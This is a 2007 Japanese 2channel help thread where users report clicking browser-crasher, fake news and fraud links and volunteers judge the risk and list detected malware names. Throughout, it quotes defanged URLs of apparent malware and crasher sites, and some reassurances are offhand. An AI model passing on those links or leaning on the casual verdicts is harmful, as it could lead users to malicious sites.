>>201 上はgoogleのタイプミスにつけこんだスパイウェア配布サイトだった、らしい
今現在は、踏んで即危険というわけでは無い様だけど、
ランダムで詐欺くさい広告窓が立ち上がる。サイトの本質は変わって無いのだろう
下はその通りの内容。マカフィーの広告動画かと思われ
206 :
名無しさん@お腹いっぱい。 :2007/01/13(土) 21:12:49
誤検知(ウィルスコード)なので放置でおk
>>207 誤検知ですか・・スレダウンロードするだけでウィルスに感染なんてするの?!
って思って焦ってこのスレにきました。ありがとうございます。
スレ内にウィルスコードが書かれていたというこでしょうか?
>>208 意味不明な妙な文字列があったのならそれがウィルスコード
直リンすまん
216 :
名無しさん@お腹いっぱい。 :2007/01/14(日) 19:00:16
217 :
名無しさん@お腹いっぱい。 :2007/01/14(日) 19:54:58
俺がいつも使っているパソコンが壊れたので、ノートからの質問です。 ブラウザを動かすと残像みたいに無限にブラウザが出てくるようになってしまいました。 Alt+F4でも、再起動しても直りません、助けてください。
>>216 無限アラート。タスクマネージャからブラウザ強制終了で脱出できる
PCに特に悪影響は無い
>>217 (残像消えずにいつまでも残っているのなら)
物理的にPCがいかれた場合にそんな症状になる場合もある
修理逝き
219 :
216 :2007/01/14(日) 21:42:53
>>218 ジョークみたいですね
ありがとうございます
tp://vip.6to23.com/jpgman/gui/gui.htm これってやばい? FireFoxで開いたからポップアップブロックしたけど 後に中華メッセージが出た
>>220 ひとつめのリンク先へと飛び、その後さらに画像があるリンクへと飛ぶ
ホラー系画像があまりにもゆっくり描写されたので、びびりなし(笑)
tp://headline-news.tripod.com/sports/baseball/20070114-00000185-hoc.html これの中身はなんでしょうか・・・ 変なのがダウンロードされようとしましたが
>>222 中身はもう消えたみたい。
>>214 と同じURLだね
残っていた時には確かconconクラッシャーやexeの直リンク
複数のウイルスサイトの呼び出しがあったと思う
とりあえず踏んでも即感染は無いと思うけど
一時ファイル削除して適当なウイルススキャンで何も出なければ完了
ありがとうございました
tp://dailynews.i8.com/sports/baseball/20070117-00000112-nks.html 芸スポで踏んでしまいました、アウトルックで新規作成メールの窓がたくさん開いたりしましたが、 ウイルス感染はないでしょうか?
マジですか・・・ノートンのオートプロテクト外したままで踏んでしまいました・・・
>>226 >>228 ありがとうございます
とりあえずほっとしました
さきほどからスキャンかけてるんですが、今のところ何も出てこないので
逆に不安になってました
>>228 以外に他のトロイもダウンロードしようとしてるね
NOD32でWin32/TrojanDownloader.Buskyって出たけど
>>230 うはぁ
とりあえずスキャンかけてみたんですが、何もでませんでした・・・
再起動してもう一回やってみます
>>232 うーんよくわからないです・・・
なんか新型とかでノートンじゃまだ対応してないんですかね・・・
心配ならカスペルスキーのオンラインスキャンでもしてみれば。
ちなみにPeerGuardian入れてると
>>228 はダウンロードできない。
P2PやってなくてもPeerGuardian結構役に立つよ。
>>234 ピア2もインストしているのに、立ち上げていませんでした・・・何やってんでしょうね自分
カスペルスキーのオンラインスキャン試してみます、色々ありがとうございます
>>237 そこもPeerGuardianでブロックされる。
直接的なアドバイスじゃないがPeerGuardian入れとくといいよ。
超おすすめ。
240 :
237 :2007/01/22(月) 08:18:52
オンラインスキャンしてみてもなにもウイルスは検出されなかったのですが
タスクマネージャーが起動できなくなったり
ドラッグ アンド ドロップが出来なくなったり
カナ漢字入力システムを組み込みましたって書かれた窓がたくさん開いたりして
気持ちが悪いのでOSを再インストールしました
普段はjavaとかActiveXを常にoffにしているのですが
フラッシュゲームのページだと思って油断して踏んだらやられちゃいました
ウイルスソフトを何も使ってなかった自分が悪いのですが・・・
>>238 >>239 アドバイスありがとうございました
今後は対策ソフトを導入したいと思います
241 :
名無しさん@お腹いっぱい。 :2007/01/22(月) 21:11:09
242 :
名無しさん@お腹いっぱい。 :2007/01/22(月) 21:15:39
243 :
名無しさん@お腹いっぱい。 :2007/01/23(火) 01:39:02
>>243 びびらせ洒落サイト
アクセスすると、文字列多彩な画面がだぁーとスクロール
そのあと
全部冗談です。製作者は善良なのです。
よく耐えました。あなたは真の勇者です。
マラカスパンダをクリックして交流広場にお進みください。
コーヒーでも飲んで、バクバクしている心臓を落ち着けましょう。
がでてくる。^^
こういうブラクラサイトを検査するソフトとかってないんですかね? どこかの個人がやれば小遣いかせぎにはなると思うんですが トレンドマイクロあたりにやってほしい
>>245 ブククラじゃないぞ、ジョークサイトで無害だぞ
247 :
781 :2007/01/23(火) 02:21:36
>>242 のことじゃなくて一般的なブラクラのことね
最近はられてるゴッグル(goggle)とか
そいうことかー そういやさっき、さっそgoggle貼られてたわw
友人5人で大学のパソでgoggle gorgleとかブラクラ踏みまくって遊んでたら、 鮮やかにバレテひどいめに・・・
250 :
名無しさん@お腹いっぱい。 :2007/01/23(火) 18:37:46
251 :
名無しさん@お腹いっぱい。 :2007/01/24(水) 16:12:43
これ踏んじゃったんですが大丈夫でしょうか ? tp://www.lbycwi.org/images/Logos/LBYC%20Burgee-w-text-huge.jpg なんか巨大な画像が出てきます。
253 :
名無しさん@お腹いっぱい。 :2007/01/24(水) 22:27:59
tp://webnews.writernetwork.com/JP/sports/baseball/20070124-NPB0037.html 踏んでしまいました・・・ WindowsUpdateはやってて、使っているAntiVirusは ノートンです。 ちゃんとUpdateはしてますが・・・なんかPC遅くなりました。 よろしくおねがいします。
254 :
名無しさん@お腹いっぱい。 :2007/01/24(水) 22:47:42
>>253 中身自体は
>>222 と同内容
各種ブラクラ、それと一応ウイルスサイトの呼び出しがあるので
一時ファイル削除してウイルススキャン
PCが遅くなるのは多分メモリを大量に消費しているので
ウイルススキャン終了後にでも再起動を
257 :
名無しさん@お腹いっぱい。 :2007/01/25(木) 18:25:14
すみません、これ踏んじゃいました tp://dailynews.7p.com/sports/baseball/ob20070125-0000021.html だいじょうぶでしょうか?
258 :
名無しさん@お腹いっぱい。 :2007/01/25(木) 19:03:00
【使用OS】 XP 【WindowsUpdateしてるか】 最近はしていません 【AntiVirusは何を使っているか】 ウィルスセキュリティー 【ちゃんとUpdateしてるか】 最近していないです・・・ 【スキャンした結果】何も発見されませんでした。 【別のオンラインスキャンしたならその結果は】 ウィルスバスターでスキャンしたのですが、何も発見されませんでした 【症状を具体的に、分かる限りすべて書く】症状は特にないです。 【何をしたらそんなことになったのか】 ここ踏んじゃいました・・・。 tp://www2.strangeworld.org/uedakana/ ウィンドウがたくさん出て、OutlookExpressも勝手に起動しました。 【これまでにとった措置】 強制的に電源を切って、再起動して一時ファイルの削除、ウィルススキャンしました。 【その他の質問】 危険なウィルスやスパイウェアに感染してしまったのでしょうか?
261 :
名無しさん@お腹いっぱい。 :2007/01/25(木) 22:41:01
追記です OS XPSP2 ブラウザ IE6 拡張子ではなく、内容(ryは無効 初めて踏んだんでびびりました('A`)
やっとロダに繋がった…
>>261-262 いわゆる「ノートントラップ」
実体はただのテキストファイルでアンチウイルスが反応する文字列が
ずらずらと書いてあるだけの代物
踏んでも実害は無い。放置でおk
265 :
258 :2007/01/26(金) 15:25:01
>>260 レスありがとうございます。安心しました。
266 :
名無しさん@お腹いっぱい。 :2007/01/26(金) 22:34:23
マシンがPen4 3.4 RAM1.5Gなのでそれほど重いとは感じないけど 2006に戻そうか考え中 Pen4 2.2では多少だるさが感じるので一気に全部2006に戻そうかな?
tp://chiffon.ty.land.to/src/Chiffontea0650.jpg 上記をふんでしまいましたが、実害はありますでしょうか? OS : XP Pro sp2 AntiVirus : Norton(2ヶ月期限切) WindowsUD:最近してません 上記URLをsleipnirで表示した際,mailtoストーム Media Player,telnet接続等が発生しました。 4>>だとおもわれますが、最近はこんなのもあるんですね・・・ sleipnirのJavaScript,Active X系はすべてoffで、 プログラムが起動するとは思いませんでした。
>>267 各種ブラクラ+ウイルスサイトの呼び出しがあるので
とりあえずウイルススキャン
運悪くサイトに繋がって且つOSに穴が開いている状況だと感染も有り得る
269 :
名無しさん@お腹いっぱい。 :2007/01/27(土) 12:24:03
270 :
名無しさん@お腹いっぱい。 :2007/01/27(土) 12:51:23
?? 2ちゃんねるのスレッドでしょ?
272 :
名無しさん@お腹いっぱい。 :2007/01/27(土) 13:07:42
スイマセン。間違えました。 668 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:20:56 ID:WivsBDHm0 tp://www.mayhem.net/juke/bodiesbeat1.html ↑mp3大量 無料 こっちです・・
274 :
名無しさん@お腹いっぱい。 :2007/01/27(土) 13:48:04
>>268 レスありがとうございます。
定義期限切れですがスキャンで問題なかったので、
解決したことにします。
?? 2ちゃんねるのスレッドでしょ?
踏んじゃいました・・・情けない・・・うぅぅ ↓のダウンロードって書いてあるところのリンクです。 tp://kasamatusan.sakura.ne.jp/cgi-bin2/src/ichi72163.jpg.html html見てみたんですけどこれかな?↓ tp://s15.j-a-net.jp/gateway/click.cgi?a=62524&d=66939&u= 御願いしますm( __ __ )m
281 :
名無しさん@お腹いっぱい。 :2007/01/28(日) 05:18:21
>>280 に追記
>>3 の一種でしょうか?メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成まで一緒で、最後に音が大音量でした
OSアップデータはしてあります。
ウィルス対策ソフトはウイルスセキュリティーZeroです。
283 :
名無しさん@お腹いっぱい。 :2007/01/28(日) 06:14:37
>>282 ありがとうございますm( __ __ )m
現在VSでのスキャンが完了、感染なし
久しぶりにシマンテックのオンラインスキャンを実行してみたところ
半分スキャンした時点で4個詳細は今のところ不明です。
VSのクオリティーには驚かされます。
284 :
280 :2007/01/28(日) 06:37:57
VSで引っかからなかった奴をシマンテックオンラインスキャンで やってみた結果です。感染は全てgikonaviのdatファイルでした ウイルス名はWScript.KakWormが3つとVBS.Freelink.B が1つ これはもしかして、datファイル内にウイルスコードが残ってるって事? datファイル消したらおkかしら?
あ、すいません上のなしでw ググったらわかりますた
これ踏んじゃいました。
http://smart.45.kg/loveodagiri/garally/ AVG Free Edition で2個のファイルが隔離されましたが
その後いきなり再起動がかかりました。
AVGでフルスキャンすると
Boot Sector of Drive C が Changed と表示されました。
一応回復コンソールから fixmbr fixboot をやりました。
他にやっておくべきことはありますでしょうか?
288 :
286 :2007/01/30(火) 22:28:59
ありがとうございます。そこにあるやつをかけてみます。
289 :
名無しさん@お腹いっぱい。 :2007/01/31(水) 01:59:06
>>289 呼び出されるサイトがある程度ランダムなので
確実な事は言えないけど、踏んでみた範囲では
即危険性のあるサイトには当たらなかった
ただどっちにしろまともなサイトだとも思えんので
心配なら適当なウイルススキャンはしておいて損は無いかと
(特に開いたページの、どこかリンクを踏んでしまったとかならなおさらの事)
使用ブラウザがIE6以前なのかな?ポップアップブロックのあるブラウザなら
収拾がつかないって事態にはならなかったと思うけど
tp://up2.viploader.net/pic/src/viploader404501.jpg AVG Free7.5.432で何もないって出たんですが、 単にJPG偽装のGIFで、精神的なものだけでしょうか?
普通のサイトに行ってみたらウィンドウが大量に表示続けました。 なんとか止めてウイルススキャンしたんですが何もなし。 で、また同じサイトに行ったんですが今度は普通に見れました。 これってそのサイトがヤバいのかそれとも自分のパソコンがハッキング受けてイタズラされたのでしょうか?
tp://members.jcom.home.ne.jp/i-am-a-student-boy/begin.htm これなんでしょう?そのあとの書き込みにワロタとか書いてあったんですが ポップアップブロックが働きました。鑑定お願いします。
295 :
293 :2007/02/01(木) 04:30:29
>>294 ネタサイトでしたか・・なんだかレジストリとか出てたので怖かったです。びびりました。
レス来るのを本当に待ってました。ありがとうございます。
キャッシュ消して、ウィルススキャン今やってます。このスレの方には本当に助かってます。
ありがとう。
296 :
291 :2007/02/01(木) 11:08:20
>>294 ありがとうございます
衝撃が頭から離れない(^^;;
297 :
名無しさん@お腹いっぱい。 :2007/02/03(土) 13:04:27
298 :
名無しさん@お腹いっぱい。 :2007/02/03(土) 14:01:02
>>297 中身はもう消えてる
多分例のごとくニュースサイトのURLに見せかけてウイルスサイトを大量に
引っ張ってくるやつだったとは思うが
>>298 「ページが見つかりません」だった
そのページはもともと無かったか、サイト側で消したのかは分からないが
そこはジョークサイトなのでまぁPCに悪さをするような事は無いはず
>>295 削除されて今はただのgif
トロイを踏んだ恐れあり
>>301 あのあと、McAfee、カスペルスキー、Ad-Awareでチェックしましたが何も検出されませんでしたよ
すべて、最新の状態に更新してのチェックですが。
>>304 FDDアタックとかはともかく、複数のウイルスサイトの呼び出しがある
OSないし使用ブラウザに穴があると感染も有り得る
一時ファイル削除してウイルススキャン
>>305 サンクス
ウイルススキャンしたけど感染ファイルはありませんでした
踏んだ瞬間、パソコンがガタガタいったので怖くなってすぐに閉じました
あとどんなウイルスかよかったら教えてください
どんな、と言われても。とりあえずざっと反応があったのは
「Exploit.HTML.Mht」「Trojan-Downloader.Win32.Obfuscated.n」
「AdTool.Win32.MyWebSearch」「Trojan-Spy.Win32.Banker.cgh」
「VirTool.Win32.VB.af」「Email-Worm.Win32.Lentin.g」
「Trojan-Spy.Win32.Banker.bsh」
こんな所。ワームやらアドウェアやら色々
ただ、exeやscrの直リンクはアンチウイルスは反応するだろうが
ブラウザ越しで踏んでも即実行される訳でも無いから、それほど危ないものでも無い
穴ついて感染を狙う類のやつは面倒なので深く調べてない
そういうものは大抵感染したそばから他のマルウェアを次々と落としてくるだろうから
被害の程度が予測しづらい。おまけに比較的頻繁にソースが変えてくる
現実的には
>>304 とかを直接踏んで、ド糞重い海外の有害サイト全てがきっちり呼び出されて
感染まで至るかと問われれば…運も絡むのかね
ありゃ、もう消えちまったか
まぁ大方画像URLに見せかけたブラクラ+ウイルスサイトの呼び出しだろう
>>312 検出されたのが
>>313 のやつだけなら特に必要な措置は無いんだが…
心配なら一時ファイル削除して適当なウイルススキャン。何も出なければそれでおk
315 :
312 :2007/02/08(木) 14:45:36
>>313-314 どうも有り難うございます
一時ファイル削除してウイルススキャンしてみましたが特に異常はありませんでした。
調べて見ましたら、メールの窓が沢山開いたのでもしかしたらMailtoストームというものだったのかも?
.jpgだったんで、てっきり画像だと思ったのが落とし穴でした。
316 :
名無しさん@お腹いっぱい。 :2007/02/10(土) 18:36:45
>>316 crashmeのコピーかな。本家の方は消えたかなり前に消えたんだけども
踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ
318 :
名無しさん@お腹いっぱい。 :2007/02/10(土) 23:56:02
317 ウイルス感染したと思い、オンラインスキャンで調べておりました。 カスペで調べると、Worm.Win32.Antinny.ayに感染したと警告がでました。 調べると、どうやらWinny関連のウイルスのようなので、一安心してましたが・・ (Winnyは使ってないので) その後感染ファイルを見ると、以前NOD32で検出し、隔離?されていたものに反応していただけのようでした。 念の為、ウイルスバスターのオンラインスキャンで調べてみると、問題なしだったのでほっとしたところです。 >踏んでもシステム感染とかは無いので、脱出できたのなら特に問題は無いよ そうでしたか!。これで今日はぐっすり眠れます。 レス、有難うございました。
これなんかもちょっとずつ名前変えてあちこちに大量にコピーサイト作り、 キーワード設定して、引っかかる人を待っている悪質なやつだな。 信のブログ ワープするのだ! countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html 恒のブログ ワープするのだ! noishferry.blog82.fc2.com/blog-entry-11.html 修のブログ ワープするのだ! kutanired.blog83.fc2.com 信 ワープするのだ! sophiawhite.blog76.fc2.com/blog-entry-2.html 諭のブログ ワープするのだ! viss12670508.blog88.fc2.com/blog-entry-12.html 勉のブログ ワープするのだ! kainkachua.blog68.fc2.com 弁護士恒の日記とブログ ワープするのだ! noishferry.blog82.fc2.com/blog-entry-13.html
武板にこんなん貼られてた 178 名前:名無しさん@一本勝ち[sage] 投稿日:2007/02/12(月) 23:54:23 ID:PIMQ1kRw0 tp://www.110kz.com/003/virus.htm こういう技があるんだなぁ〜、、 すごすぎる。
既出
323 :
名無しさん@お腹いっぱい。 :2007/02/13(火) 14:03:56
tp://dailynews.7h.com/sports/baseball/20070212-000000261-chu.html mac osx10.3 セキリュチイは何もしてませんでした マックのアイコンがグルグルしたままなので 再起動しました 大丈夫でしょうか
>>323 ページが消えてしまっている上にmacに関しては全くの門外漢なんだ
力になれずすまん
ページ内容が、この所頻出している
ニュースサイトに見せかけたブラクラ+ウイルスサイトだったなら
あれは大概がWindows(IE)前提みたいなものだから
感染はほとんど無いと思うんだが…
それでも心配なら適当なウイルススキャン…だが
mac対応のオンラインスキャンというとシマンテック(ノートン)
くらいしか思いつかん
325 :
名無しさん@お腹いっぱい。 :2007/02/13(火) 17:49:49
ありがとっす あのURLでウイルスとはいやな世の中になったもんだ
326 :
名無しさん@お腹おっぱい。 :2007/02/13(火) 19:13:41
> 401 名前:名無しさん@恐縮です[] 投稿日:2007/02/13(火) 22:05:38 ID:r4qssjOg0 > > > 契約未更改の中日・福留、中村紀入団報道に「真面目に野球やるのがあほらしくなりますね」 > ://newstoday.8m.com/sports/baseball/cd20070213-00000038-chu.html newstodayと書いてあって今日の日付なので踏んでしまいました
328 :
名無しさん@お腹いっぱい。 :2007/02/13(火) 23:46:08
下のURLを踏んでしまいました・・・。
どうすればいいのか教えて下さい!
791 名前:ひよこ名無しさん :2007/02/11(日) 19:29:58 ID:sc0BYyZT
すみませんがお願いします。
ttp://sixxx.info/celebs.html 792 名前: ◆.vDUUxqvlE :2007/02/11(日) 19:42:25 ID:???
>>791 洋エロ系サイトに逝きます
閉じると悪質タイプの偽装インチキセキュリティ系ポップが開きます
AcroRd32.exe が起動しようとするので遮断
Trojan.Clicker.HTML.Agent をClamWinで検出
not-a-virus:Downloader.Win32.WinFixer.m をカスペで検出
PC有害
>328 完全にかぶったw スマン
332 :
328 :2007/02/14(水) 11:43:13
>331 トン! インストールはしませんでした 大丈夫のようですかね、本当にありがとう
333 :
名無しさん@お腹いっぱい。 :2007/02/16(金) 22:14:12
tp://headlines.pwac.net/20070216-00000526-yom-soci.html ※このアドレスは危険URLのひとつです。 注意!アラートオープンを発見! (3) 注意!ループタグを発見! (2) 危険!mailtoストームを発見! (410) 危険!FDDアタックを発見!(7) 危険!無限ループを発見! (2) 危険!ニュースストームを発見! (3) 危険!Telnetストームを発見! (3) ブラクラチェックが終了しました。 ↑な感じだそーですが特に危険ウイルス等はないと判断していいんでしょうか
>>333 ありゃ、404か。通報食らって消されたかな
SCOの判定部分がそれで本当に全部なら、問題無いが
※ インラインフレームタグを発見しました。
↑こんなの無かったかな?
いつも通りの手口なら、これでウイルスサイトを大量に呼び出すように
仕向けていたようだけど
サイトが生きているうちに踏んじゃったのなら
一応ウイルススキャンを
tp://adserving.cpxinteractive.com/click,JyUgAInLAgDZhAMA4WMBAAAA.AEAAP8A.wD..wAABgOpWAIAHdIAANU8AgAAAAAAAAAAAAAAAAAAAAAAAAAAACaH2EUAAAAA,,http%3A%2F%2Fwww%2Emediafire%2Ecom%2F%3F6uwmw2mtdzy, 踏んでしまいました・・・ 怪しげなポップアップが出て その後一応スキャンしても何も出なかったんですけど
日曜日の秘密基地って結構長寿番組だったのか
>>336 ランダム広告かな
懸賞とか儲け話とかの餌で個人情報の収集を図るとか、まぁそんな類の手合いかと思う
何回か確認した限りでは、踏んで即感染とかそういう悪質なのは無かった
開いた窓を地道に閉じていったのなら問題無いかと
338 :
お願いします :2007/02/24(土) 13:53:33
>>316 を私も先日踏んでしまいました。
どうすることも出来ずにPCを強制終了しました。
それから数日経ちますが、特にこれといった不具合が出ていないのですが、とても心配しています。
スキャン(PCのシステムツールの中にあるもの)はしましたが、エラーはありませんでした。
PC暦は長いのですが、こういったことには無頓着で初心者です。ご教示下さい。
PCはWindows MEです。
踏んだことで何か懸念されることを教えていただきたいのです。宜しくお願い致します。
>>338 WinMeでも回答としては
>>317 と同様
強いて言うなら、踏んで終了できなくなったからといって
強制電源断とかやるとHDDに損傷を与える可能性はある
サイト自体は単なる嫌がらせの域を出ない程度のもの
340 :
338 :2007/02/24(土) 18:12:56
>>339 ありがとうございます。
そうですか・・ホッとしました。
こういったことは今までのネット生活の中では無縁の経験だったのですが、
2ちゃんをやるようになって、このスレを見てもこういうのが多いということに正直あたふたしております。
強制終了は良くなかったようですね。
ただ、最初は頭が真っ白になって「なになになにぃぃぃい〜〜!?!?」となってしまい、
なんとか閉じようとしてたのが20秒くらいでしょうか、無理だと悟り、強制終了してしまいました。
>踏んで終了できなくなったからといって強制電源断とかやるとHDDに損傷を与える可能性はある
どうすることが最良でしたでしょうか?無知でお恥ずかしいです。
どういう状態の画面が出てきたか今でも覚えていますが、本当に気持ち悪くて、本当にやめて欲しいです・・
でも、序の口で私の言ってることは笑われてしまうようなことでしたらお恥ずかしいですm(__)mすみません。
(踏んだ自分が悪いのですが。今後充分に気をつけます。)
341 :
名無しさん@お腹いっぱい。 :2007/03/02(金) 21:07:58
342 :
名無しさん@お腹いっぱい。 :2007/03/02(金) 22:07:07
ttpも抜いて><
343 :
名無しさん@お腹いっぱい。 :2007/03/02(金) 23:29:26
tp://www.hamepara.com/index_333.php/?na=333 このページの再生を踏んでしまいました
>>341 もうページが消えてるが、おおかた
>>6 の手口だろう
専ブラの画像ポップアップとかでは無く、直接踏んでしまったのなら
一時ファイル削除してウイルススキャン
>>343 ワンクリ詐欺サイト
何かを取得しているっぽい画像が色々出てきただろうが
全部こけおどしだ。徹底無視でいい
あわててこっちから連絡とか取らないように
345 :
名無しさん@お腹いっぱい。 :2007/03/03(土) 09:31:04
【使用OS】 windowsXP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】
フリーのavast、元から入ってるセキリュリティ対策ツール
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】
トロイの木馬、マルウェア? ファイルに感染してる
【別のオンラインスキャンしたならその結果は】
昨夜、avastでトロイ、他を感知。
推奨でチェストに移動しました。
今朝、セキュリティ対策ツールを実行してみたところ
何も検出されませんでしたが、心配でその後、
avastでスキャンしたらまたトロイが2つ発見
【症状を具体的に、分かる限りすべて書く】
今のところ何もありません。
URLを踏んだ時に勝手にDLさせようとしてきたので再起動..
【何をしたらそんなことになったのか】
http://www.mainichimsn.itgo.com/shakai/jiken/news/20070302k0000e040055000c.jpgを踏んでからです 。
そのスレの鑑定人さんにはavast使えばあまり問題はない、
と言っていました。
【これまでにとった措置】
駆除、隔離。
【その他の質問】
このままうまく駆除出来なかった場合どう対処すればいいか
いいかわかりません。 よろしくお願いします。
そういえばワンクリック詐欺で意見投稿フォームを設置していた 馬鹿サイトがあったね 「ばーーーーーーーーかwwwwwwwwww」と送っておいたが、今はもうそのサイトは無いんだよなw
インターネット一時ファイルを全て削除
これはまだ消えてないのか
…呼び出し先が60ヶ所以上に増えてる
>>348 WindowsUpdateの状態と踏んだ時に呼び出したサイトによっては
感染も有り得るので、心配なら
>>349 やって適当なウイルススキャン
351 :
345 :2007/03/03(土) 18:10:56
345です。 何回駆除、削除してもトロイが感知されます。 アバストで隔離、削除したのですが・・・。 知り合いの詳しい方に見ていただいたところ、 隔離、削除でおkとの事だったのですが、 今セキュリティ対策ツールでスキャン中ですが スパイウェア&ウイルス合わせて 20いくつ感知されてるみたいです。 どこに感染してるかはどこを見ればわかりますか?? 今危険な状態ですよね?! 優しい方アドバイスお願いします。 何度もすみません。
>>348 俺もこれさっき踏んでしまった
nodでトロイ3種類の警告出たよ
>>348 私もこれを踏んでしまい報告しにここに来ました。
トロイなのか・・・最悪
とりあえずインターネット一時ファイルを削除してAhnLabの「マイシールド」という
ソフトで検索したけど何も出てきませんでした。
それでもまだ不安です。どうすればいいでしょうか?
使用OSはWinXPHOME-SP2、Windowsupdateはやってます。
Antivirusは上記の「マイシールド」を使ってます。
355 :
るんた :2007/03/03(土) 19:20:45
えっと古いPCからノートPCにしたのですが最近のなのでセキュリティが 高くなっていて以前のPCで入っていたチャットが入れなくなってしまい 入ろうとすると セキュリティ保護のため、このサイトによるこの コンピュータによるActiveXコントロールのインストールがInternet Explorerに より停止されましたとなってしまうのですがどうすればいいのでしょうか・・?
>>348 はトロイなのか?すぐ閉じたけどTrojan.JS.Windowbomb.gしか検出しなかったぞ
357 :
るんた :2007/03/03(土) 19:22:27
人のスレにかきこんでしまってすいませんでした;;。
>>356 Windowbombを検知した段階で悪サイトの呼び出しを防いでいるのかも知れん
そこら辺は使用アンチウイルスの挙動による
>>348 の作成者は、とりあえず既知のブラクラと有害そうなURLを
ありったけ放り込んでるだけで、各サイトの生存とか、ブラクラが発動した上で
悪サイトの呼び出しまできっちり行われるのか、とかいう所は恐らくいちいち確認していない
360 :
343 :2007/03/03(土) 23:24:05
>>344 遅くなりましたがありがとうございました。
>>354 アドバイスありがとうございます。
さっきAhnLab V3のウィルスログを見たら、踏んだ直後に
Win-Trojan/Exploit-WMF.Gen
というのを検出・削除してました。
これはちゃんとAntivirusソフトが機能していると考えていいですよね?
362 :
名無しさん@お腹いっぱい。 :2007/03/04(日) 02:47:42
>>348 サンスポの記事かと思い踏んだところ
error 404というページに出て、すぐに消したんですがその後のスレで
菌とかトロイとか書かれていてすごく不安です。
PCはmacXです。どうすればよいのか教えてほしいです。
363 :
名無しさん@お腹いっぱい。 :2007/03/04(日) 02:55:41
macOSXは完全にUNIX系OSだし、自動感染はあまり心配しなくていいと思う。
364 :
名無しさん@お腹いっぱい。 :2007/03/04(日) 03:22:39
>>363 362です。早速お答えいただきありがとうございます。
無知ですいません。自動感染以外に感染方法があるのでしょうか?
実行形式のファイルがそのまま落ちてくる事があるので それを誤って走らせてしまうと危険かも知れん が、件のページはあなたが踏んだタイミングの時には 既に消えている(404)ので心配しなくていい
366 :
名無しさん@お腹いっぱい。 :2007/03/04(日) 04:03:08
>>365 そうですか…安心しました。
安易に踏んでしまったので気をつけます。
ありがとうございました。
367 :
名無しさん@お腹いっぱい。 :2007/03/04(日) 18:52:09
ブラクラでウイルスに自動感染させられない 為の選択肢としてmacOS XやLINUX、BSDなど を導入するってのはあるな。
最近芸スポでブラクラ貼る奴がいるね・・・ 初心者がやたらひっかかってウイルススレになっとるよ
芸スポ板は行った事が無かったが
テキトーに開いたスレにいきなり貼ってあった
一応人の集まりそうなスレ狙って爆撃してるのかね
>>368 件のサイトの作成者はそういった反応見て楽しんでるんだろうな
芸スポだけじゃないな 最近ブラクラ貼ってる奴大杉
Operaでここを開くと印刷プロパティが表示されるのですが これはブラクラとは違うのでしょうか? www.desktopcustomize.com/modules/windows4/content/index.php?op=print&id=8 調査をお願いします。
>>371 IEで開いても同様だね
ソース内に window.print() があるので、スクリプトの走る環境なら
多分どのブラウザでも印刷するかどうか訊いてくると思う
動作としては適当なページで Ctrl+P した時と同じはず
サイト内のどこに貼られたリンクか分からないけど
文字通りページを印刷するためのものとして設置されたのだと思う
悪意は無いと思うよ
>>372 どうも。
メール作成画面を勝手に開いたり、印刷プロパティを勝手に開いたり
この手の問題は心臓に悪いですね。
ブラウザ側でこの辺の動作をユーザー側で停止できたら良いのに
と思います。
374 :
名無しさん@お腹いっぱい。 :2007/03/06(火) 16:02:36
p://www.vipper.net/vip192711.jpg.html ニュー即から踏みました。
実際の拡張子はhtm 有害サイトを力いっぱい読み込みます mailtoスト―ム、conconあり ダイアラー、スパイウェアもあり
377 :
名無しさん@お腹いっぱい。 :2007/03/08(木) 10:21:38
ノートン2007でスキャンしてたら、スキャンファイル名「滝川クリトリス」なるものが見えました。 ノートンはスルーですが、ググるとウイルスのように書いてあります。 とりあえずファイル検索で『滝川クリトリス』を調べましたが引っかかるものはありませんでした。 これはウイルスなんですかね。
379 :
名無しさん@お腹いっぱい。 :2007/03/08(木) 10:51:19
専ブラにまとめてブラクラを登録したいんだけども、まとめサイトとかないもんですかね?
tp://webftp.athuman.com/~haa470045/onc/re/index.php PCにて踏んでしまいました…。 なんかVIP銀行一億振り込め的なメッセージが出るんですが、これはイタズラですよね? ただその直後何かが勝手にインストールされたようで不安でしかたがありません…。 環境はXPのSP2 ブラウザはスレイプニル。 SpybotとAdAwareSEとウイルスバスター2006を使って検索しましたが何も見つかりませんでした…。 ちなみに3ソフトとも数時間前に更新したばかりです。 これは一体なんなんでしょうか?
>>382 え゛、画像でしたか…。
一度スパイウェアを仕込まれた時とそっくりだったんでビビってましたorz
さすがに画像だとは思いもしませんでした
とりあえず安心してよいようなので、寝ようかと思いますw
なんか無駄に疲れました、精神的に。
では、ありがとうございました。
384 :
名無しさん@お腹いっぱい。 :2007/03/11(日) 00:17:06
tp://vipup.sakura.ne.jp/512kb/src/512kb_7856.jpg ニュー速から踏みますた。 怪しいファイルを実行するスレッドとどちらに書くべきか良く分かりませんが・・・・ブラクラも含んでいます。
>>384 >>3 を含む各種ブラクラ、ウイルスサイトの呼び出し、ウイルスコードの羅列…かな
何か適当に作った?のか知らないが、ページがうまく機能してないように思える
「Exploit.Win32.IMG-WMF.v ファイル: cyber[1].wmf」
「Trojan-Downloader.JS.gen ファイル: test[1].htm」
「Trojan-Downloader.HTML.Agent.ca ファイル: ads[1].htm」
「Trojan.Win32.Agent.qt ファイル: 35[1].exe」
「Trojan-Downloader.JS.Agent.bw ファイル: happy2[1].htm」
「Email-Worm.Win32.NetSky.t ファイル: phone_number2[1].pif」
ざっと検出したのはこんな所
一応危険サイトに繋がる可能性はある
WindowsUpdateの更新具合によっては感染もあるかも知れん
一時ファイル削除して適当なスキャンして何も出なければ完了
386 :
名無しさん@お腹いっぱい。 :2007/03/11(日) 03:11:32
388 :
386 :2007/03/11(日) 03:48:23
>>388 被害対策のページになります
リンクを踏むのが嫌でしたら「アダ被」でグーグル検索してみてください
一番目に出ます
390 :
386 :2007/03/11(日) 04:02:18
>>389 参考にさせていただきます。
ありがとうございました。しかし請求書はくるんですかね?
恐いな・・・
だからアダ被に移動しろよアホ('A`)
変なの踏んだのかも知れませんが、スレで荒らしから2chに アクセスするまでのWeb履歴を晒されてしまったのですが、 こんなウィルスってありますか? 対処法を教えて下さい
どこのスレ?
SSうpだろ
tbs-mondai.tripod.com/main.html さっき踏んじゃいました、判定お願いできませんでしょうか。
tripod系を踏むなと何度言えば
399 :
名無しさん@お腹いっぱい。 :2007/03/16(金) 15:37:01
